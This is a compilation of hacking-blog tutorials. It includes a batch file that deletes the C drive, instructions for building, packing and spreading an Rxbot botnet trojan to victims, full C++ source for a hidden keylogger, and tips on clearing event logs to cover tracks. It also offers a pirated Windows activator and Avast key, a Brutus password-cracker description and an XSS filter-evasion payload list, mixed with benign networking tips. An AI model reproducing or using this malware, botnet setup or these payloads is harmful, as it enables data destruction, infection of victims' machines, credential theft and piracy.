How to Make the virus

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
 

Ethical Hacking

Guide to Ethical Hacking: Tools and Free Tutorial on Ethical Hacking

What is Ethical Hacking?

Computer hacking is a practice with many nuances. Intent, whether benign or malicious, is often in the eyes of the beholder. When examining the root cause of a website hack or application exploit, it pays to follow the money. A hacker will be motivated by whomever or whatever is sponsoring his or her actions. The computer security industry coined the term “ethical hacking” to describe a hacker who benevolently attacks a network or other security system – whether private or public – on behalf of its owners. Ethical hackers are also called white hat hackers, as distinguished from the black-hatted bad guys.
One grey area in ethical hacking is hacktivism, where the hacker detects and reports (but sometimes exploits) security vulnerabilities as a form of social activism. In these cases the motivation isn’t money, but rather to call attention to an issue or injustice the hacker believes merits social change. However, the victim of the hack may not be so receptive to this message. Ethical hacking should always be undertaken with the express advance consent of the targeted organization – as many black hat hackers claim to be ethical hackers when caught.

Why Use Ethical Hacking?

Why pay someone to hack into your own application or website? To expose its vulnerabilities of course. Any law enforcement officer will tell you to prevent crime, think like a criminal. To test a security system, ethical hackers use the same methods as their malicious brethren, but report problems uncovered to their client instead of taking advantage of them. Ethical hacking is commonplace in the Federal government, where the practice initiated in the 1970s, and many large companies today employ white hat teams within their information security practice. Other online and internet slang terms for ethical hackers include “sneakers”, red teams and tiger teams. Computer programmers can even learn ethical hacking techniques from a variety of certification authorities.
In the world of application security, online ethical hacking takes the form of penetration testing. “Pen tests” are performed in as realistic scenarios as possible to ensure that the results accurately mimic what an intruder could potentially achieve. Manual application testing employs human experts – ethical hackers – that attempt to compromise the app and report what they find. Typically a variety of tests are performed, from simple information-gathering exercises to outright attacks that would cause damage if actualized. A full blown ethical hack might even include social engineering techniques such as emailing staff to dupe them into revealing passwords and other account details.

Veracode and Ethical Hacking: Automated Tools to Expose Vulnerabilities

Penetration testing exposes software coding errors and other vulnerabilities that threaten critical data, user accounts and other application functionality. Not all pen tests are performed manually, however. Ethical hackers may employ automated tools such as static analysis and dynamic analysis. Veracode performs both dynamic and static code analysis and finds security vulnerabilities such as malicious code or insufficient encryption that may lead to security breaches. Using Veracode, penetration testers and other ethical hackers can spend more time prioritizing and remediating problems and less time finding them.
.

Clearing system logs

This tutorial will walk you through clearing the system logs on a windows computer. The system keeps a long of what programs you opened, hardware used, etc, along with time stamps, and a bunch of other information you might not want someone to see. This tutorial assumes you're using a Windows based PC.

1. Navigate to Control Panel
2. Click Administrative tools. In Windows 7, this is under System and Security in the control panel.
3. Double click and open Event Viewer
4. In the left pane, you will see all the different things that are logged. Expand these, right click, and choose Clear log for each log you wanted wiped.

Have fun :)

Internet speed boost

This tutorial will show you how to speed up your internet connection, and works on Xbox 360, ps3, Windows, Mac, and UNIX.
http://code.google.com/p/namebench/
Try out namebench. It hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation. namebench is completely free and does not modify your system in any way. This project began as a 20% project at Google.
namebench runs on Mac OS X, Windows, and UNIX, and is available with a graphical user interface as well as a command-line interface.

1. Download NameBench from the link above.
2. Install and run Name Bench
3. Look at the top right of your HTML log, and in the box where it says recommended configuration (fastest and nearest) note the top 2 servers
4. Use the first two DNS from step 3 with the following guide

• Windows XP - http://www.plus.net/support/software/dns/changing_dns_xp.shtml
• Windows Vista - http://www.plus.net/support/software/dns/changing_dns_xp.shtml
• Windows 7 - http://www.sevenforums.com/tutorials/15037-dns-addressing-how-change-windows-7-a.html

Creating a botnet

This tutorial uses mIRC and other tools, which you will need to download. You can find them via google or through pirating methods listed in the Misc Hacks section of this app.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers.
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers bots the attacker, the server, and the slave.
Quote:
while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs.
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.

1. Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
2. Download and install the Service pack 6
3. Download and install Windows SDK
4. Open up Microsoft Visual C++ Compilier 6.0
5. Go to Tools > Options and Click the Directories tab
6. Now, browse to these directories and add them to the list: (Click the dotted box to add) C:PROGRAM FILESMICROSOFT PLATFORM SDK
   C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
   C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
   C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB
7. Make sure they're in the order above (use the arrows to adjust the order)
8. Download Rxbot 7.6
9. Open the Rxbot 7.6 > configs.h folder and edit these lines only: Put in quotations:
   char password[] = Bot_login_pass; // bot password (Ex: monkey)
   char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
   char serverpass[] = ; // server password (not usually needed)
   char channel[] = #botz_channel; // channel that the bot should join
   char chanpass[] = My_channel_pass; // channel password
   Optional:
   char server2[] = ; // backup server
   char channel2[] = ; // backup channel
   char chanpass2[] = ; //Backup channel pass
10. Make sure Microsoft Visual C++ is open
11. Select File > Open Workspace
12. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
13. Right Click rBot Files and click Build:
14. rBot.exe will be in the Rxbot 7.6 > Debug folder !!! YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

How To Increase Your Memory Card Space 1GB To 2GB

Friends,today I am going to tell you about very Interesting tricks.most people using memory cards with mobile phones,cameras & many device.some one using small capacity memory cards with their device.so today i am tell you how to increase your memory card space.you can convert a 1GB memory card to 2 GB with the help of free software.

Here is steps to do it.

 1) First of all we have to make sure that its a 1 GB memory card. This only works on 1GB and it supports only in some of the rare cases. 

2) Now connect your memory card with PC and backup all your data in that because we have to format the drive.

3) After backing up now open the Skimedi Fix 2GB Capacity application (Download here).

4) A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located.

5) After selecting the drive press on FIX and then the updating process will be followed up. It will ask your conformation whether you agree to format or not. click on yes.

6) Later it will ask to replug the device. Just replug the memory stick card and put it back. The size of the memory will be increased from 1Gb to 2Gb. you can see the properties before and after the cracking process.

7) After that you can also check the memory size in phone and also you can test the size by copying all the data to it which is around 2Gb.

You can reopen the Skimedi Fix and select the drive again where it shows us the size as 1912mb which is nothing but 2Gb.

Windows 7 Activator Free Download 100% Workin

Windows 7 is the awesome operating system of the Microsoft. But the thing is that they are just allowing this OS for 30 days only. So we need to install windows 7activator.

 windows 7 activator will active your windows in 5 min. In the windows 7 there are many moe applications like games , snipping tool and much more ..Before installing the activator your windows 7 is as shown in the bellow figure which is in just trial version ! You can see in the bellow snapshot there are 23 days left for activation.

Now for converting your trial version of windows 7 in to genuine you need to download windows 7 activator ( download link provided at the end of the post). After downloading activator Open that rar file and just double click on windows 7 loader then press yes and wait for 2 min after that it will say you to restart the pc after restarting your PC your windows 7 will be genuine as shown in bellow figure. Now your windows7 is fully activated.

password:   asifameerbakhsh.pakistan

Download link : http://www.tusfiles.net/qbyrsnfyu61f

Free Avast Antivirus Serial Key Till 2038

Avast Free Antivirus is a full-featured product, with the same antivirus and anti-spyware scanning engine used in our premium products. Version 7.0 provides even faster protection than its predecessor and offers a web-reputation browser extension as well as virtualization technology. Accurate threat updates via avast. CommunityIQ technology ensure worry-free downloading, surfing, social networking, and gaming--for over 170 million registered users (and over 130 million active users).

                                

What's new in this version: Version 7.0.1456 has fixed problem with random opening of the SafeZone and SSL connection issues with SMTP.

Note: Download Avast Antivirus and Apply the key
AVAST KEY FOR REGISTRATION TILL 19/1/2038 :

W6754380R9978A0910-4TZ59467

→Download Avast Antivirus

Brutus Password Cracker – Download brutus-aet2.zip AET2

Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 370,000 downloads. Development continues so new releases will be available in the near future.

Brutus was written originally to check routers etc. for default and common passwords.

Features

Brutus version AET2 is the current release and includes the following authentication types :

• HTTP (Basic Authentication)
• HTTP (HTML Form/CGI)
• POP3
• FTP
• SMB
• Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.

The current release includes the following functionality :

• Multi-stage authentication engine
• 60 simultaneous target connections
• No username, single username and multiple username modes
• Password list, combo (user/password) list and configurable brute force modes
• Highly customisable authentication sequences
• Load and resume position
• Import and Export custom authentication types as BAD files seamlessly
• SOCKS proxy support for all authentication types
• User and password list generation and manipulation functionality
• HTML Form interpretation for HTML Form/CGI authentication types
• Error handling and recovery capability inc. resume after crash/failure.

You can download it here:

Brutus AET2

Cool Mozilla Hacks | Hacking Mozilla Firefox

1. Browser In browser and again browser in browser and so on...


Enter the following string in to your Mozilla Firefox address bar and see what happens

chrome://browser/content/browser.xul

I think you entered just once now enter again in the new browsers address bar and continue enjoying it.. Below is the snapshot of this hack:

Browser in Browser hack in Mozilla Firefox

2. Special Effect Scrolling Mozilla Firefox

You will really love this effect...little bit irritating but awesome...as its isoftdl special by Lokesh uff LoneRusher or Destructive Mind....Just type below text in address bar of Mozilla..

chrome://global/content/alerts/alert.xul

3. Display Cookies without any Cookie Manager

You can view cookies directly in Mozilla Firefox just by entering below text in the address bar..

chrome://browser/content/preferences/cookies.xul

4. Check history of Mozilla Firefox directly through URL

Ahhah...Alternate way to view history in better way.. Just enter the below text into the address bar to see the History of visited websites....

chrome://browser/content/history/history-panel.xul

5. Display all your bookmarks

We can view our bookmarks directly using below URL in address bar..

chrome://browser/content/bookmarks/bookmarksPanel.xul

6. Advanced Tab using URL

You can directly view the advanced tab in firefox using below URL..

chrome://browser/content/preferences/advanced.xul

7. Advanced Javascript settings:

chrome://browser/content/preferences/advanced-scripts.xul

8. Setting for clearing History and Cookies and other stuff..

chrome://browser/content/preferences/sanitize.xul

9. Change or view Font Settings in Firefox

chrome://browser/content/preferences/fonts.xul

I think you all like these cool tricks or hacks.... If you have any queries ask me in form of comments..

How to code Keylogger in C++ Stepwise by HackingLoops

What is Keylogger ?

Keylogger as the word itself suggest logging or capturing keys or key strokes. Technically, Keylogger is a software tool or program which is used to capture key strokes that user presses in real time and further processing depends on nature of keylogger that it is a physical keylogger or remote keylogger and the technique of capturing key strokes is called keylogging. And it is really hard to believe but keylogging is the easiest method to hack anybody's password, what you need is just a good keylogger, good crypter and knowledge about spreading your keylogger program. Thousands of keyloggers are available in the web world for free but its really irony that all of them are either detectable by antivirus or owner has attached virus to them to hack its users. So its obvious, we need to be cautious while using freely available keyloggers or cracked version of paid keyloggers. But why to try to become a prey to other hackers when designing of new of your own is damn easy. Most novice hackers or simply called script kiddie's think that coding a good keylogger is very tedious and hard task but believe me after reading my this tutorial, it will become a funny task for you guys to code a keylogger. Today i will teach you the complete inward and outward logic of keylogger.

I have divided coding of keylogger in few parts to make it easier for Hackingloops users to understand it properly and if need writing your own logic for different parts if you think my logic is not optimized. So friends lets start learning how to code keylogger in C++ stepwise. As we all know( explained above) that keyloggers capture keystrokes, so there can be several methods to capture the key like capturing the keyboard API Input and output, such keyloggers called API based keyloggers or simply capturing the keys after it gets decoded by your OS ( hardware keyboard sends instructions to OS drivers, which decodes the every key pressed on keyboard into useful alphabets). Today i will teaching you later one. So lets start friends..

Note : You can use Borland C++ compiler or Code blocks C++ compiler for coding the stuff, i usually prefer DEV C++ i.e. Borland C++ compiler.

Now open any of your compilers and create a new project or simply open a text file and name is as anything.cpp ( means whatever you wish).

So lets start coding:

Step 1 : Declaring header directives to include the standard functions

#include <iostream>
using namespace std;     //used to avoid the compilation errors because of redefinition of variables.
#include <windows.h>
#include<winuser.h>

Right now we only need these three header directives and these are mandatory.

Step 2 : Declaring global calls :

int SaveLogs (int key_stroke, char *file);

void Stealth();  //Declare stealth function to make you keylogger hidden.

Step 3 : Main Function ( mandatory field, this executes the complete code and separate functions or classes).

int main() 
{
    Stealth();       // This will call the stealth function.
    char i;          //Here we declare 'i' from the type 'char'

    while (1)     // Here we say 'while (1)' execute the code.
    {          
       for(i = 8; i <= 190; i++)
        {
if (GetAsyncKeyState(i) == -32767)
SaveLogs (i,"MYLOGS.txt");    // This will send the value of 'i' and "MYLOGS.txt" to our SaveLogs function.
        }
    }
    system ("PAUSE"); // Here we say that the system have to wait before exiting.
return 0;
}

/************************************Seperator********/

Step 4 : Writing capturing keys logic

int SaveLogs (int key_stroke, char *file)   // Here we define our SaveLogs function.
{
    if ( (key_stroke == 1) || (key_stroke == 2) )
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");
    
    cout << key_stroke << endl;

        if (key_stroke == 8)  // The numbers stands for the ascii value of a character
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");  
        else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
        else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
        else if (key_stroke == VK_TAB)        
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
            else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
            else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
                else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
                else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
                    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
                    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
                        else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
                        else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
                            else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
                            else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
                            else
                                fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
    return 0;
}

/************************************Seperator********/

Step 5 : Stealth function
This part of code will help you to hide your keylogger from victim and kept the program window hidden.

void Stealth()

{

  HWND Stealth;

  AllocConsole();

  Stealth = FindWindowA("ConsoleWindowClass", NULL);

  ShowWindow(Stealth,0);

}

Step 6 : Email Function

:P i will explain it later...

Now compile your code and that will generate one binary file or exe file :P that is your keylogger. And all your logs will

I hope you all have enjoyed the article. Step 6 is not disclosed because i want to explain the difference between physical keylogger and remote keylogger. So guys, now u might got this that this is a Physical keylogger. You can only view data on same machine on which binary is running.

If you have any doubts please ask in form of comments.

How to trace an Email Sender in Gmail

How to Trace Email received in Gmail:

1. Basic Method(if sent through some website)

This method is applicable for tracing the email that is sent through the anonymous email or email forging websites. I have already explained earlier about email forging and how to send anonymous emails. If you wish to revise the Email Forging and How to send anonymous and fake emails visit below articles:

1. What is Email Forging? 

2. How to send anonymous and Fake emails?

What is the main motive behind the fake emails, Have you guys ever tried to understand. If no, then here is three four basic things why Fake emails or anonymous emails are sent.

1. For Phishing purposes: Fake page links that are used to hack your email account.

2. For Spreading Botnets: Fake emails with attachments(.php,.jpg,.bmp etc) contains bots means self spreading Trojans that steals your email contacts and email that to hackers.

3. For Stealing your personal information or to cheat you.(mails like you won 10000000$ please send us your details to claim).

4. For promoting or virul a product. Most sellers use this trick to promote their companies products online on the name of email marketing but thats all fake they are in need of customers who can buy them and some already has bots attached in them to the mail has been automatically sent to all emails that are in your friend list.

Steps to trace Email received in Gmail (very basic method):

1. Login into your Gmail account.

2. Open the email whose sender details you want to see.

3. Click on Show details.

4 That's all it will show you all basic information about the email. Below snapshot will explain you better.

 

Click on Show details to see basic details

Information inside the show details for tracing email

2. Advanced Method:

The above trick hardly helps you to trace the email address. Now let's discuss advanced way to trace email.

Have you guys ever tried to under how emails are sent and received. Ahhahah Computer geeks you might have read in books about How email works that how its sent and how its received. If yes, then you surely haven't implemented that in practical life. For New Geeks read this article to know how email really works:

How email really works tutorial

Emails are basically received in form of HTML headers. HTML headers consist of several things like Message delivered to or from, Subject, Received to or from, Date, Mime version,Content Type, X-mailer client etc.

How to trace email Advanced trick:

1. Go to the email and open it.

2. Now click on the triangle at top right end corner of the email screen as shown below and select show original email.

Detailed hack to trace email received in Gmail

3. Now you will see something like this:

More detailed Inner look of email In Gmail

Now See the second received: from SecretMythPC [71.142.245.186] . Its the source IP address ( IP address of system) from which email has been sent.

Now open Any IP address tracing website: Example i opened http://whatismyipaddress.com/

Now Trace the IP addess 71.142.245.186 to get his details and location of the sender. You will see something like this in the output:

His Complete Location chart

Trace Route Tutorial for Hackers

Hello Friends, In our previous tutorial we have discuss about ping sweep, today i will explain you the Trace route or simply routing in windows. I know all you know what is trace route but actually you really don't. Its quite different and its use is also quite different. I know you always tried to understand the output of trace route but not been able to what each line means in trace route. So after reading this you can understand everything quite clearly. Today i am writing my WHITE PAPER ON TRACE ROUTE..So read on..

What is Trace Route?

As the name suggests trace route, means tracing the path, but which path. Actually whenever any user opens any website in his web browser, from him it opens directly but have you ever tried to understand what background processing is going on. How your web browser actually getting to that address. That working of website i will explain on some other day but for now must know to reach to some web address, our web browser goes to different paths and chooses the best suitable path having the minimum response time.

Trace route is a network based utility which shows the path over the network between two systems and lists all the intermediate routers to get to the final destination. For what purpose trace route is used ? Main purpose of trace route is to fix network problems. This helps you in identifying, while connecting to some network where the connection is actually slowing down, which intermediate router is responsible for that. 

Technically trace route is also an ICMP echo based protocol similar to ping.

But its only a primary use, for what else we can use this. As i have already told you how to get an IP address. Now when you do trace route with that IP address what it will show is that which service provider the victim is using means ISP(Internet service provider), this will help you in determining his few basic things like Country, state and sometime more deeper information too. Now how this is going to be helpful for Network forensic experts. Suppose you have made an hacking attempt on some bank or some government or some security concerned website, what they do is that they store an IP address and timestamps of each visitor in their database. Now what network forensic expert will do is that it will trace route your IP address and confirm your ISP and your country( country from which ISP belongs). Now Forensic expert will contact your ISP and provide your IP address and time to ISP and ask him to provide details that at that time this IP was assigned to which person and that how they will get complete address of the hacker and catch him red handed. I hope you got my point why trace route is that much important. 

How trace route is done practically?

In windows, trace route is done by using the command tracert in command prompt. You can do it two different ways:

1. To trace route an IP address: This can be of any website or any computer system or of any network.

SYNTAX:

tracert IP(like tracert 127.0.0.1)

2. To trace route websites: When you don't know website's IP address let trace route to translate that address for you.

SYNTAX:

tracert websiteaddress(like tracert www.google.com)

More options:

-d     Do not resolve address to host-names

-h (maximum hops) Maximum number of hops to search the target system

-j (host-list)      Loose source route along with host-list

-w timeout       Wait timeout milliseconds for each reply

Linux trace route has more options available.

Note: you will always get less results in case when you try to trace route an Computer system of any victim. Ahhahhh more precisely you will only get around 3 to 10 entries. Three to Four when firewall of the victim doesn't alter your trace routing and more when firewall blocks ICMP echos.

Note: If you get asterisks(*) after the first entry then it confirms that firewall is playing its part and it doesn't allowing us to trace route the system but still we will be able to get his ISP address and with that we can get his location overview.

Understanding Trace Route:

Below is snapshot of normal trace route output of victim (normal computer):

Trace route live practical example.

Lets start from very first Line:

1. Very first line after the tracert shows Host Name and IP address which it got using the reverse DNS(domain name system) look up.

2. Over maximum 30 hops: 30 hops means that traceroute will only route first 30 routes between your system and victim's system. 30 is too much it usually ends in 3 to 15 hops but sometimes it goes deeper based on security and no response(as in our first case when we tries to route 14.97.26.147).

Note: Timings are basically round trip times. There are three round trip times in ping. The round trip times (or RTTs) tell us how long it took a packet to get from me to that system and back again, called the latency between the two systems. By default, three packets are sent to each system along the route, so we get three RTTs.

3. This is the address translation private IP by any one of the services from these ( RIPE, ARIN, APNIC, LACNIC, AfriNIC).

These are the IP address ranges for these private IP's:

10.0.0.0 – 10.255.255.255,

172.16.0.0 – 172.31.255.255,

192.168.0.0 – 192.168.255.255 

and 224.0.0.0 - 239.255.255.255 are reserved IP Addresses for private internet use for network address translations of above mentioned services.

4. This means that the target system could not be reached. More accurately, it means that the packets could not make it there and back; they may actually be reaching the target system but encountering problems on the return trip (more on this later). This is possibly due to some kind of problem, but it may also be an intentional block due to a firewall or other security measures, and the block may affect trace route but not actual server connections.

5. If firewall doesn't block remote connections then the result will be like this.

Note: This step provides the ISP(Internet service provider).

Now Understanding trace route for websites:

Trace route of website

Since hackingloops is a blog hosted on google that's why at start it reverse DNS name as ghs.l.google.com and translated IP address of hackingloops is 209.85.175.121. So our destination is 209.85.175.121

Now steps 1 to step 4 shows private internet use addresses as explained above which is used for address translation. Step 5,6 and 9 are also static private IP addresses with which but these are local IP addresses for your localhost with with the DNS communicates.

Step 7 and 8 determines the response from your ISP address. Above clearly predicts i am using tata teleservices ISP.

Step10 and 13, 14 and 15 are also Google IP address responses as this is google blog.

Steps 11 and Step 12 retrieves the different DNS servers of hackingloops.

Step 16 shows our destination..

The above was meaning now lets explain whole process in a go....

First of all my system reverse DNS the IP address of Hackingloops which is found to be 209.85.175.121,Now since i haven't mentioned any specific hop count so by default it considers maximum value as 30 hops. Now my system contacts to IANA service ( RIPE, ARIN, APNIC, LACNIC, AfriNIC) requesting the response from IANA to get the translated address.  After a successful query to IANA service it returns the response back to my local system(192.168.***.***) . In between my system also get response from my ISP which is tata teleservices. Now after a successful acknowledgement our system contacts to Google server(72.14.222.166 and 72.14.232.93) which in return returns the DNS server names( for hackingloops and then google confirms the response and returns back the actual web page.

The Complete Guide to XSS

What is Cross Site Scripting?

---

Cross-site scripting (XSS)is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other objects.

There are three distinct types of XSS vulnerabilities:
non-persistent
persistent
and DOM-based (which can be either persistent or non-persistent).

Non-persistent cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If any occurrence of the search terms is not HTML entity encoded, an XSS hole will result.

Persistent XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.

DOM-based XSS vulnerability, also referred to as local cross-site scripting, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short. With DOM-based cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself. For instance, if a piece of JavaScript accesses a URL request parameter and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS hole will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side scripts.

Finding XSS Vulnerabilities

---

The most common used XSS injection test is:

<script>alert("XSS")</script>

When this example is injected into an input box or a URL parameter, it will either fire or it will fail. If the injection fails, it doesn't mean the site is secure, it just means you need to look deeper.

XSS Filter Evasion

---

Escaping From Strings

The first step is to view source on the Web page and see if you can find the injected string in the HTML.There are several places you may find it completely intact, yet hidden from the casual observer.The first is within an input parameter:

<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

In this example we could alter our input to include two characters that allow the injected code to jump out of the single quotes:

'><SCRIPT>alert("XSS")</SCRIPT>

Now our code renders because we have ended the input encapsulation and HTML tag before our vector, which allows it to fire. However, in this case, the extraneous single quote and closed angle bracket are displayed on the Web page.This can be suppressed if we update our vector into the following:

'><SCRIPT>alert("XSS")</SCRIPT><xss a='

This turns the code output into:

<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

As a result, the JavaScript code is injected with no visible indication of its existence.The <xss a=''> tag does not render, because it is not valid.

Working Around Filtered Quotes

Let's use the same example above, but assume the Webmaster included code to put slashes in front of any single quotes or double quotes (i.e., add_slashes()). Our previous vector without the last part would now turn into:

<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

There are several methods to try and work around this it all depends on the filtering in place. One method is to use Character Entities. Some characters are reserved in HTML. For example, you cannot use the greater than or less than signs within your text because the browser could mistake them for markup. If we want the browser to actually display these characters we must insert character entities in the HTML source.

"	"	"	quotation mark, apl quote
&	&	&	ampersand
&#60;	&lt;	<	less-than sign
&#62;	&gt;	>	greater-than sign

Using the code (&quot;) or (&#34;) in place of our quotes is one method to try and work around quote filtering. Example:

<script>alert("XSS")</script>

<script>alert(&quot;XSS&quot;)</script>

<script>alert(&#38;XSS&#38;)</script>

If no quotes of any kind are allowed you can use fromCharCode in JavaScript to create any XSS code you need. The fromCharCode() takes the specified Unicode values and returns a string. Example:

<script>alert("XSS")</script>

<script>alert(String.fromCharCode(88,83,83))</script>

<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>

You can use the For MySql char(ASCII,ASCII,...): calculator bellow to translate your code into CharCode.

Working Around <SCRIPT> Filtering

Some filters will filter out <script> making it impossible for any of the above examples to work. However, there are many other ways to insert JavaScript into a Web page. Let's look at an example of an event handler:

<BODY onload="alert('XSS')">

The "onload" keyword inside HTML represents an event handler. It doesn't work with all HTML tags, but it is particularly effective inside BODY tags.That said, there are instances where this approach will fail, such as when the BODY onload event handler is previously overloaded higher on the page before your vector shows up. Another useful example is the onerror handler:

<IMG SRC="" onerror="alert('XSS')">

Because the image is poorly defined, the onerror event handler fires causing the JavaScript inside it to render, all without ever calling a <script> tag.

Using IMG SRC

The two most commonly permitted HTML tags are <A HREF, which is used for embedded links, and <IMG, which is used to embedded images. Of these two, the most dangerous is the IMG tag. The follow illustrates some examples of why this tag is problematic:

<IMG SRC="nojavascript...alert('XSS');">

No quotes and no semicolon:

<IMG SRC=nojavascript...alert('XSS')>

Filtering quotes and script:

<IMG SRC=nojavascript...alert(&quot;XSS&quot;)>

Using CharCode to work around filtering quotes:

<IMG SRC=nojavascript...alert(String.fromCharCode(88,83,83))>

A simple attack vector, like the one above, can be even further obfuscated by transforming the entire string into the decimal equivalent of the ASCII characters:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Using the ASCII table you can decipher this example, and then use the same method of obfuscation to create your own injectable string. The same can be done for hexadecimal:

<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;& #x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>

While the javascript: directive syntax inside images has been depreciated since IE 7.0, it still works in IE 6.0, Opera 9.0, Netscape 8.0 (when in the IE rendering engine, although it has also been depreciated as of 8.1)

Using Tab, New Line, and Carriage Return

Tab, new line and carriage return characters can also be used to trick XSS filters.

<IMG SRC="jav&#x9ascript:alert('XSS');">

The example above uses a tab Minimum Sized Decimal to break up the word javascript intern breaking up the XSS and tricking the filter. The output above will look as follows:

<IMG SRC="jav ascript:alert('XSS');">

	Horizontal Tab	New line	Carriage Return
URL	%09	%10	%13
Minimal Sized Hex	&#x9	&#xA	&#xD
Maximum Sized Hex			
	
Minimum Sized Decimal	&#9	&#10	&#13
Maximum Sized Decimal						

Using Null character

Another character that can cause problems for filters is the null character. This is one of the most obscure and powerful tools in any XSS arsenal. Take this example URL that can lead to a valid injection:

<SCRIPT>alert("XSS")</SCRIPT>

The null character () stops the filters from recognizing the <SCRIPT> tag. This only works in IE 6.0, IE 7.0, and Netscape 8.0 in IE rendering engine mode.

Not filtering inside encapsulating pairs

Bypassing filtering that looks for open and closing pairs of encapsulation inside HTML tags and ignore the contents. Example:

<IMG """><SCRIPT>alert('XSS')</SCRIPT>">

